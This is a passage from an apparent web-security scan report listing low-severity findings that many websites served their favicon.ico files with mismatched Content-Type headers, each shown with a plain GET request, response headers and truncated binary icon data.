The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Length: 3638
Connection: close
Content-Type: text/html; charset=UTF-8

...... ..........&...........h.......(... ...@........................................]......[...............OG..........[...vw...)....................................................................
...[SNIP]...

27.68. http://www.ehealthforum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ehealthforum.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ehealthforum.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:02 GMT
Server: Apache
Last-Modified: Tue, 23 Sep 2008 12:24:47 GMT
ETag: "8e59f3-8be-4578f40dce1c0"
Accept-Ranges: bytes
Content-Length: 2238
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerehealthforum_POOL=3336900780.0.0000; path=/

...... ..............(... ...@.......................................................................................................G.....W....I.U.A............. .....M........... ....(...........
...[SNIP]...

27.69. http://www.ehow.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ehow.co.uk
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ehow.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 1150
Content-Type: text/html
Set-Cookie: v=NEW; expires=Mon, 02 May 2011 14:00:19 GMT; path=/; domain=www.ehow.co.uk;
ETag: "6ed485fcdbc3fdf6d0a3a393e95f5a88:1300482785"
Cache-Control: max-age=40957
Date: Sat, 02 Apr 2011 14:00:19 GMT
Connection: close

............ .h.......(....... ..... .....@......................................s...........................c...........................,...........................................................,..
...[SNIP]...

27.70. http://www.epicurious.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.epicurious.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.epicurious.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 04 Jun 2008 23:08:29 GMT
ETag: "62a-47e-44edf4e873540"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:00:00 GMT
Connection: close
Cache-Control: max-age=600
Expires: Wed, 16 Mar 2011 22:53:18 GMT

............ .h.......(....... ..... ...............................3...3...3...3...3...3...3...3...3...3...3...3...3...3.......4...4...4...4...4...4...4...4...4...4...4...4...4...4...4...4...6...6...
...[SNIP]...

27.71. http://www.epinions.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.epinions.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.epinions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:50 GMT
Server: Apache/2.2.14 (Unix) PHP/4.4.9
Cache-control: private
Set-Cookie: EPV_PgVwID=e060b1a6c3caf55e5af3d016; path=/; domain=.epinions.com;
Content-Length: 2494
Content-Type: text/html

...... ..............(... ...@...................................@............ ..@ ... ... ...@..@@...@...@...`..@`...`...`......@...............@...............@...............@............. .@. ...
...[SNIP]...

27.72. http://www.examiner.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.examiner.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.examiner.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 12:43:53 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Last-Modified: Fri, 01 Apr 2011 19:35:39 GMT
ETag: "a84a1-47e-49fe083c418c0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 12:43:53 GMT
X-WebNode: web7.b.examiner.com

............ .h.......(....... ..... .....@....................................f3`.f3..f3..f3..f3..f3..f3..f3`.........................f3 .f3..f3..f3..f3..f3..f3..f3..f3..f3..f3..f3 .............f3 .f
...[SNIP]...

27.73. http://www.ezanga.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ezanga.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ezanga.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:44 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 03 Jan 2010 01:06:23 GMT
ETag: "1950026-57e-47c38369b41c0"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................................!...    #..<.,..#*.l'?..R...`...y>.BH3.BB<.)FM.(OM.{nX....K...R..V.:._...I...Y...d...l..x.!.h.'.x.I.d.[.|...j...r.......
...[SNIP]...

27.74. http://www.familybuilder.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.familybuilder.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.familybuilder.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:55 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 03 Feb 2011 20:05:58 GMT
ETag: "200a6c6-288-49b664b3b7580"
Accept-Ranges: bytes
Content-Length: 648
Connection: close
Content-Type: text/plain; charset=UTF-8

.PNG
.
...IHDR...............h6....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?......... .V...][y......ow....l8.v..../..%.)....s/.-.............|>...(......h.....,...7X4...=..F.a
...[SNIP]...

27.75. http://www.fantage.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fantage.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fantage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:50 GMT
Server: Apache
Last-Modified: Wed, 24 Dec 2008 23:18:01 GMT
ETag: "a704a2-25be-45ed31a685c40"
Accept-Ranges: bytes
Content-Length: 9662
Content-Type: text/plain; charset=UTF-8

......00.... ..%......(...0...`..... ...................................................................................................................................................................
...[SNIP]...

27.76. http://www.faqs.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.faqs.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.faqs.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:36 GMT
Server: Apache
Last-Modified: Thu, 05 Mar 2009 07:19:28 GMT
ETag: "61f8071-e36-46459fd194000"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain

...... ..........&...........h.......(... ...@.......................................pp..UU..XX..yy..........--..............vw..........ED..........!!.."!.. ...........''..xy..........''..$"..$$..$#
...[SNIP]...

27.77. http://www.fastcompany.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fastcompany.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fastcompany.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:52 GMT
Server: VoxCAST
Last-Modified: Wed, 11 Mar 2009 23:44:19 GMT
ETag: "c39671-3aee-464e0723e9ac0"
Accept-Ranges: bytes
Content-Length: 15086
Cache-Control: max-age=604800
Expires: Thu, 07 Apr 2011 06:45:23 GMT
Vary: Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 198569
Content-Type: text/plain; charset=UTF-8

......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$.................................................................................................+...Z...x..................
...[SNIP]...

27.78. http://www.fetedoris.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fetedoris.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fetedoris.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:36 GMT
Server: Apache/2.2.2 (Fedora)
Last-Modified: Fri, 23 Jul 2010 00:22:56 GMT
ETag: "2b001f-9f6-951f800"
Accept-Ranges: bytes
Content-Length: 2550
Connection: close
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...

27.79. http://www.filestube.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.filestube.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.filestube.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:23:16 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 9
Connection: close
Content-Type: text/html; charset=iso-8859-1

Not found

27.80. http://www.findagrave.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.findagrave.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.findagrave.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:26 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 21:53:32 GMT
ETag: "1a78463-57e-49491a7ba0f00"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

..............h.......(....... ........................................................,,,.........LLL...............................................................................................
...[SNIP]...

27.81. http://www.finishline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.finishline.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.finishline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 28 Apr 2006 20:50:34 GMT
ETag: "384135-1036-db2cba80"
Accept-Ranges: bytes
Content-Length: 4150
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:03:05 GMT
Connection: close

...... ..........F...........h....... ......0...V...................(... ...@...................................................................................k...H...%............z...b...Js..2P...
...[SNIP]...

27.82. http://www.flixster.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flixster.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.flixster.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:51:52 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 20:46:18 GMT
ETag: "47e"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:51:52 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................(rt..@E..BI..BK..@L..bn.....8...............................^........ 6..q........3.......-..Zj........................
...[SNIP]...

27.83. http://www.food.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.food.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.food.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 03 Mar 2011 11:48:55 GMT
Accept-Ranges: bytes
Content-Length: 1406
X-Cnection: close
Content-Type: text/plain
X-Pad: avoid browser bug
Expires: Sat, 02 Apr 2011 15:42:53 GMT
Date: Sat, 02 Apr 2011 13:42:53 GMT
Connection: close

..............h.......(....... ...............................u!......4.................................................................................................................................
...[SNIP]...

27.84. http://www.fortunecity.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fortunecity.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fortunecity.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:41 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.0
Last-Modified: Mon, 24 Aug 2009 23:04:18 GMT
ETag: "593c6dd-338-4a931c72"
Accept-Ranges: bytes
Content-Length: 824
Connection: close
Content-Type: text/plain

BM8.......6...(..................................................................................................................\\\..........................................zzz...]]].................
...[SNIP]...

27.85. http://www.freecause.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freecause.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freecause.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.6.34
Date: Sat, 02 Apr 2011 13:31:42 GMT
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 03 Mar 2011 19:30:48 GMT
ETag: "12f4b79-47e-1105ea00"
Accept-Ranges: bytes
Content-Length: 1150
P3P: CP=NOI DSP COR TAIa PSAa PSDa OUR IND UNI OTC policyref="http://www.freecause.com/w3c/p3p.xml"

............ .h.......(....... ..... .....@....................................M...^.f.c...e...f...e...b...Z...............................[.@.d...l...o...t...x...v...q...i...b.......................]
...[SNIP]...

27.86. http://www.freeonlinegames.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freeonlinegames.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeonlinegames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:16 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 24 Mar 2010 16:48:10 GMT
ETag: "18090c0-47e-b1fda680"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@.......................................................................................................................................................xxx...
...[SNIP]...

27.87. http://www.freeze.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freeze.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeze.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:16 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

27.88. http://www.freshdeals.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freshdeals.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freshdeals.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 08 Sep 2010 21:58:53 GMT
ETag: "1b0018-57e-48fc69e8a4140"
Accept-Ranges: bytes
Content-Length: 1406
P3P: policyref="http://www.freshdeals.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=552517
Expires: Fri, 08 Apr 2011 23:08:58 GMT
Date: Sat, 02 Apr 2011 13:40:21 GMT
Connection: close

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

27.89. http://www.funbrain.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.funbrain.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.funbrain.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:27:15 GMT
ETag: "436-3ba36634b1fc0"
Expires: Sat, 02 Apr 2011 13:27:15 GMT
Last-Modified: Tue, 01 Apr 2003 03:28:07 GMT
Server: Apache
Set-Cookie: Apache=10.243.58.175.1301750835307007; path=/; expires=Sun, 01-Apr-12 13:27:15 GMT; domain=.funbrain.com
Content-Length: 1078
Connection: keep-alive

..............(...&... ..........N...(....... .........................................................................................................................................................
...[SNIP]...

27.90. http://www.gamehouse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gamehouse.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamehouse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:37 GMT
Server: Apache/2.2.11 (CentOS)
Last-Modified: Tue, 11 Nov 2008 01:40:48 GMT
ETag: "58b82a5-436-45b5ff805e800"
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660;expires=Sun, 03-Apr-2011 15:07:42 GMT;path=/;domain=gamehouse.com

...... ..........&...........(.......(... ...@.........................................................................................................................................................
...[SNIP]...

27.91. http://www.gamevance.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gamevance.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamevance.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:26 GMT
Server: Apache
Last-Modified: Fri, 23 Jul 2010 08:31:15 GMT
ETag: "380265-47e-48c09dbad3ac0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=18000
Expires: Sat, 02 Apr 2011 18:53:26 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ........................................    ...........................,....................................................X.................."...    ..................
...[SNIP]...

27.92. http://www.gamewinners.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gamewinners.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamewinners.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:45:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 23 Nov 2001 01:42:32 GMT
ETag: "1087a2-13e-54177200"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=UTF-8
Age: 1
X-Cache: HIT from www.gamewinners.com
X-Cache-Lookup: HIT from www.gamewinners.com:80
Via: 1.0 www.gamewinners.com:80 (squid/2.6.STABLE16)
Connection: keep-alive

..............(.......(....... ...................................{...s...k...c{..Zs..Zk..Rc..JZ..JR{.BJk.:BZ.!):.............vS.3C!&.wc%...&.wt{...X...y...y...B%.CX..."|.cH..t#...W..d#Q.Dh.."#3'UfzX.
...[SNIP]...

27.93. http://www.gardenweb.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gardenweb.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gardenweb.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:50 GMT
Server: Apache
Last-Modified: Sun, 10 Mar 2002 16:42:12 GMT
ETag: "1ecab5-57e-39bd85e920100"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@........................................h....................................................................................................................
...[SNIP]...

27.94. http://www.genealogy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.genealogy.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.genealogy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:39 GMT
Server: Apache
Set-Cookie: SessionID=991df4142c2bdfff4d973003; path=/; domain=.genealogy.com; expires=Friday, 31-Dec-2010 23:59:59 GMT
Set-Cookie: GComStoreData=%0ASIT%3D001f39142c56ebff4d973003; domain=.genealogy.com; path=/;
X-ServerName: SN:gweb07:
Last-Modified: Thu, 03 May 2007 15:39:07 GMT
ETag: "297817-e36-463a021b"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerwww.genealogy.com=119122112.20480.0000; path=/

..............h...&... ..............(....... ...........@......................................J...........a.../.......]...................r...<...!...........g...................Q...(...B...x...W.
...[SNIP]...

27.95. http://www.gossipcenter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gossipcenter.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gossipcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 23 Mar 2010 18:00:05 GMT
Cache-Control: max-age=1209600
Content-Type: text/plain; charset=UTF-8
Content-Length: 3638
X-Cacheable: YES
Date: Sat, 02 Apr 2011 13:25:25 GMT
X-Varnish: 2537449880 2537448401
Age: 1
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT
X-Cache-Hits: 1

..............h...&... ..............(....... ...........@...........................I..>$\..j.._7.......X..O.u..    ..pA..0.G..R..._..(.:.G)h.h<..W2......c..wE...!..T...M..9!T..^..,.A.K,o.S0{.c9..[5
...[SNIP]...

27.96. http://www.gourmandia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gourmandia.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gourmandia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:42 GMT
Server: Apache
Last-Modified: Wed, 25 Nov 2009 21:47:28 GMT
ETag: "66880ab-e36-1415c00"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain

